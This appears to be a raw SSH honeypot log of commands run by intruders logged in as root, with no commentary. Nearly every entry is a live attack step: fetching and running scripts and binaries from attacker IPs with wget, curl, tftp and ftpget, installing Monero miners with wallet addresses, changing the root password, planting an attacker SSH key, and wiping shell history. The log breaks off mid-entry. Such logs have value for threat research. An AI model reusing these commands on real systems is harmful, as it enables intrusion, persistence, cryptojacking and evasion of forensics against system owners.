wget http://179.43.175.108/putkite/quickr1n.sh
sh quickr1n.sh

From 136.144.41.22 22-Mar-2022 22:57:52 ssh2 root
Exec wget 23.94.22.13/x86; chmod 777 x86; ./x86 nigga
wget 23.94.22.13/x86
chmod 777 x86
./x86 nigga

From 58.216.207.82 23-Mar-2022 13:28:48 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';export HOME=/dev/shm ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 ; export HOME=/root
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
export HOME=/dev/shm
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2
export HOME=/root

From 179.43.168.126 23-Mar-2022 21:01:47 ssh2 root
Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime
cd /tmp
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://179.43.175.170/putkite/quickr1n.sh
chmod 777 *
sh quickr1n.sh
echo storytime

From 179.43.168.126 25-Mar-2022 02:59:25 ssh2 root
Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:r143gsa1n431g241hs3h12344|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; ls /proc/driver/nvidia/gpus
cd /tmp
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:r143gsa1n431g241hs3h12344|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
ls /proc/driver/nvidia/gpus

From 179.43.154.137 25-Mar-2022 13:08:39 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
lspci | grep -i --color 'vga\|3d\|2d'
echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash

From 43.132.157.120 26-Mar-2022 12:54:17 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 194.31.98.246 27-Mar-2022 07:07:19 ssh2 root
Exec wget 23.94.22.13/x86; chmod 777 x86; ./x86 nigga
wget 23.94.22.13/x86
chmod 777 x86
./x86 nigga

From 134.209.199.124 27-Mar-2022 07:53:55 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/onions1337
curl -O http://45.90.161.105/onions1337
chmod 777 onions1337
sh onions1337
tftp 45.90.161.105 -c get bins.sh
chmod 777 onions1337
sh onions1337
tftp -r .sh -g 45.90.161.105
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh onions1337 .sh .sh
rm -rf *

From 120.196.217.7 27-Mar-2022 15:15:41 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 179.43.154.137 27-Mar-2022 22:54:19 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
lspci | grep -i --color 'vga\|3d\|2d'
echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash

From 134.209.199.124 29-Mar-2022 00:21:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/onions1337
curl -O http://45.90.161.105/onions1337
chmod 777 onions1337
sh onions1337
tftp 45.90.161.105 -c get bins.sh
chmod 777 onions1337
sh onions1337
tftp -r .sh -g 45.90.161.105
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh onions1337 .sh .sh
rm -rf *

From 34.122.84.129 29-Mar-2022 07:49:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/ssh.sh; curl -O http://31.210.20.190/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 31.210.20.190 -c get ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp -r ssh2.sh -g 31.210.20.190; chmod 777 ssh2.sh; sh ssh2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh; sh ssh1.sh; rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://31.210.20.190/ssh.sh
curl -O http://31.210.20.190/ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp 31.210.20.190 -c get ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp -r ssh2.sh -g 31.210.20.190
chmod 777 ssh2.sh
sh ssh2.sh
ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh
sh ssh1.sh
rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh
rm -rf *

From 64.31.8.14 29-Mar-2022 14:19:35 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/ssh.sh; curl -O http://31.210.20.190/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 31.210.20.190 -c get ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp -r ssh2.sh -g 31.210.20.190; chmod 777 ssh2.sh; sh ssh2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh; sh ssh1.sh; rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://31.210.20.190/ssh.sh
curl -O http://31.210.20.190/ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp 31.210.20.190 -c get ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp -r ssh2.sh -g 31.210.20.190
chmod 777 ssh2.sh
sh ssh2.sh
ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh
sh ssh1.sh
rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh
rm -rf *

From 177.73.2.57 29-Mar-2022 19:02:26 ssh2 root
Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cd ~
rm -rf .ssh
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys
chmod -R go= ~/.ssh
cd ~

From 118.69.226.254 30-Mar-2022 00:27:19 ssh2 root
Exec nproc;curl -O 5.161.51.216/bot;perl bot
nproc
curl -O 5.161.51.216/bot
perl bot

From 59.12.160.91 31-Mar-2022 03:30:57 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2
uname -a
cd /tmp
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2

From 85.202.169.132 1-Apr-2022 04:26:38 ssh2 root
Exec wget 23.95.0.211/x86_64; chmod 777 x86_64; ./x86_64 wns.x86
wget 23.95.0.211/x86_64
chmod 777 x86_64
./x86_64 wns.x86

From 35.227.153.91 1-Apr-2022 09:39:34 ssh2 root
Exec echo pizDone
echo pizDone

From 143.198.231.66 1-Apr-2022 14:12:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.60/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 31.210.20.60 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://31.210.20.60/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 31.210.20.60 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 144.22.251.63 1-Apr-2022 14:50:50 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN

From 72.167.41.0 1-Apr-2022 17:43:45 ssh2 root
ls
w
free -g
cd .ss
cd .ssh
ls
exit

From 167.99.211.153 2-Apr-2022 02:13:53 ssh2 root
Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +777 * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.161.105/systemd
wget http://45.90.161.105/systemd
chmod +777 *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 159.223.219.111 2-Apr-2022 13:13:21 ssh2 root
Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +777 * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.161.105/systemd
wget http://45.90.161.105/systemd
chmod +777 *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 20.86.187.120 2-Apr-2022 16:26:20 ssh2 root
Exec curl -O http://45.90.160.54/systemd ; wget http://45.90.160.54/systemd ; chmod +777 * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.160.54/systemd
wget http://45.90.160.54/systemd
chmod +777 *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 20.219.147.175 2-Apr-2022 17:51:38 ssh2 root
Exec curl -O orginal.win/start.sh ; wget orginal.win/start.sh ; chmod +777 * ; ./start.sh
curl -O orginal.win/start.sh
wget orginal.win/start.sh
chmod +777 *
./start.sh

From 206.81.22.139 3-Apr-2022 09:28:25 ssh2 root
Exec cat /etc/issue ; wget 104.248.171.242/bot.pl ; curl -O 104.248.171.242/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; rm -rf bot* ; history -c
cat /etc/issue
wget 104.248.171.242/bot.pl
curl -O 104.248.171.242/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
rm -rf bot*
history -c

From 206.81.22.139 3-Apr-2022 16:01:12 ssh2 root
Exec cat /etc/issue ; wget 104.248.171.242/bot.pl ; curl -O 104.248.171.242/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; rm -rf bot* ; history -c
cat /etc/issue
wget 104.248.171.242/bot.pl
curl -O 104.248.171.242/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
rm -rf bot*
history -c

From 161.35.84.195 3-Apr-2022 19:53:48 ssh2 root
Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.161.105/systemd
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 188.166.36.182 3-Apr-2022 20:44:32 ssh2 root
Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.161.105/systemd
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 185.176.221.91 3-Apr-2022 20:52:27 ssh2 root
Exec cd /tmp; wget http://weedbox.net/wget.sh; chmod +x wget.sh; sh wget.sh || curl http://46.246.38.61/curl.sh -o curl.sh; chmod +x curl.sh; sh curl.sh
cd /tmp
wget http://weedbox.net/wget.sh
chmod +x wget.sh
sh wget.sh || curl http://46.246.38.61/curl.sh -o curl.sh
chmod +x curl.sh
sh curl.sh

From 185.176.221.91 3-Apr-2022 21:03:56 ssh2 root
Exec cd /tmp; wget http://weedbox.net:9090/wget.sh; chmod +x wget.sh; sh wget.sh || curl http://weedbox.net:9090/curl.sh -o curl.sh; chmod +x curl.sh; sh curl.sh
cd /tmp
wget http://weedbox.net:9090/wget.sh
chmod +x wget.sh
sh wget.sh || curl http://weedbox.net:9090/curl.sh -o curl.sh
chmod +x curl.sh
sh curl.sh

From 116.252.28.121 3-Apr-2022 22:42:38 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 171.107.11.147 3-Apr-2022 22:42:44 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a

From 46.97.169.198 4-Apr-2022 00:37:11 ssh2 root
w
ls -a
php -v
yum install php -y
scp install php
cat /etc/issue
ls -as
cd /etc
ls -a
apt-get install php
php -v
apt-get install php -y
apt-getupdate
apt-getinstall apache2
apt-getinstall php
apt-getinstall php7.0-xml
apt-getinstall php7.0-sqlite3
apt-getinstall libapache2-mod-php
sudo systemctl reload apache2
sudo systemctl restart apache2
sudo apt install python-certbot-apache -y
apt-getinstall php-curl
history -c -y
apt-getupdate
apt-getinstall apache2
apt-getinstall php
apt-getinstall php7.0-xml
apt-getinstall php7.0-sqlite3
apt-getinstall libapache2-mod-php
sudo systemctl reload apache2
sudo systemctl restart apache2
sudo apt install python-certbot-apache -y
apt-getinstall php-curl
history -c -y
apt-get update
apt-get install apache2
apt-get install php
apt-get install php7.0-xml
apt-get install php7.0-sqlite3
apt-get install libapache2-mod-php
sudo systemctl reload apache2
sudo systemctl restart apache2
sudo apt install python-certbot-apache -y
apt-get install php-curl
history -c -y
php -v
ll
ls -as
ls
nano mbox
cat mbox
cd mbox
ls -as
ls
ps x
cat /proc/cpuinfo

From 130.162.183.218 4-Apr-2022 00:39:57 ssh2 root
Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +x * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.161.105/systemd
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
ifconfig
cd /dev/shm
wget http://soho.altervista.org/asssja/goshs1.zip

From 162.247.74.202 4-Apr-2022 00:44:19 ssh2 root
apt-get install wget -y
wget http://soho.altervista.org/asssja/goshs1.zip
cd /tmp
ls -a
wget http://soho.altervista.org/asssja/goshs1.zip
cd /root
wget http://soho.altervista.org/asssja/goshs1.zip
cd /var/tmp
ls
wget http://soho.altervista.org/asssja/goshs1.zip

From 161.35.82.143 4-Apr-2022 05:05:04 ssh2 root
Exec curl -O http://45.90.160.54/systemd ; wget http://45.90.160.54/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.160.54/systemd
wget http://45.90.160.54/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 159.223.223.252 4-Apr-2022 08:01:47 ssh2 root
Exec curl -O http://45.90.160.54/systemd ; wget http://45.90.160.54/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.160.54/systemd
wget http://45.90.160.54/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 144.22.226.64 4-Apr-2022 11:45:58 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN

From 179.43.154.137 5-Apr-2022 08:03:04 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ggds234e3123g4tij24jti1u3ji23rg|chpasswd|bash
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
lspci | grep -i --color 'vga\|3d\|2d'
echo root:ggds234e3123g4tij24jti1u3ji23rg|chpasswd|bash

From 68.183.1.92 5-Apr-2022 18:26:48 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/ztx; curl -O http://45.90.161.105/ztx; chmod 777 ztx; sh ztx; tftp 45.90.161.105 -c get ztx.sh; chmod 777 ztx.sh; sh ztx.sh; tftp -r .sh -g 45.90.161.105; chmod 777 ztx; sh ztx; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/ztx
curl -O http://45.90.161.105/ztx
chmod 777 ztx
sh ztx
tftp 45.90.161.105 -c get ztx.sh
chmod 777 ztx.sh
sh ztx.sh
tftp -r .sh -g 45.90.161.105
chmod 777 ztx
sh ztx
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 103.9.36.251 6-Apr-2022 07:07:18 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu

From 64.227.72.90 6-Apr-2022 15:14:23 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/ztx; curl -O http://45.90.161.105/ztx; chmod 777 ztx; sh ztx; tftp 45.90.161.105 -c get ztx.sh; chmod 777 ztx.sh; sh ztx.sh; tftp -r .sh -g 45.90.161.105; chmod 777 ztx; sh ztx; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/ztx
curl -O http://45.90.161.105/ztx
chmod 777 ztx
sh ztx
tftp 45.90.161.105 -c get ztx.sh
chmod 777 ztx.sh
sh ztx.sh
tftp -r .sh -g 45.90.161.105
chmod 777 ztx
sh ztx
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 85.202.169.124 6-Apr-2022 17:45:38 ssh2 root
Exec wget 194.31.98.248/x86_64; chmod 777 x86_64; ./x86_64 wns.x86
wget 194.31.98.248/x86_64
chmod 777 x86_64
./x86_64 wns.x86

From 34.133.127.223 8-Apr-2022 03:58:03 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 8.225.226.100 11-Apr-2022 03:48:58 ssh2 root
Exec uname -a;wget -4 http://147.182.218.113/.x/test;curl -O http://147.182.218.113/.x/test;dget -4 http://147.182.218.113/.x/test;tar -xzf test;rm -f test;cd ./-s;rpm -Uvh shc.rpm;./.s;sleep 50;rm -rf ./-s;rm -rf /dev/shm/c3pool /root/c3pool;pkill -f xmrig;rm -rf ~/.bash_history;history -cw
uname -a
wget -4 http://147.182.218.113/.x/test
curl -O http://147.182.218.113/.x/test
dget -4 http://147.182.218.113/.x/test
tar -xzf test
rm -f test
cd ./-s
rpm -Uvh shc.rpm
./.s
sleep 50
rm -rf ./-s
rm -rf /dev/shm/c3pool /root/c3pool
pkill -f xmrig
rm -rf ~/.bash_history
history -cw

From 42.97.47.17 11-Apr-2022 07:14:47 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
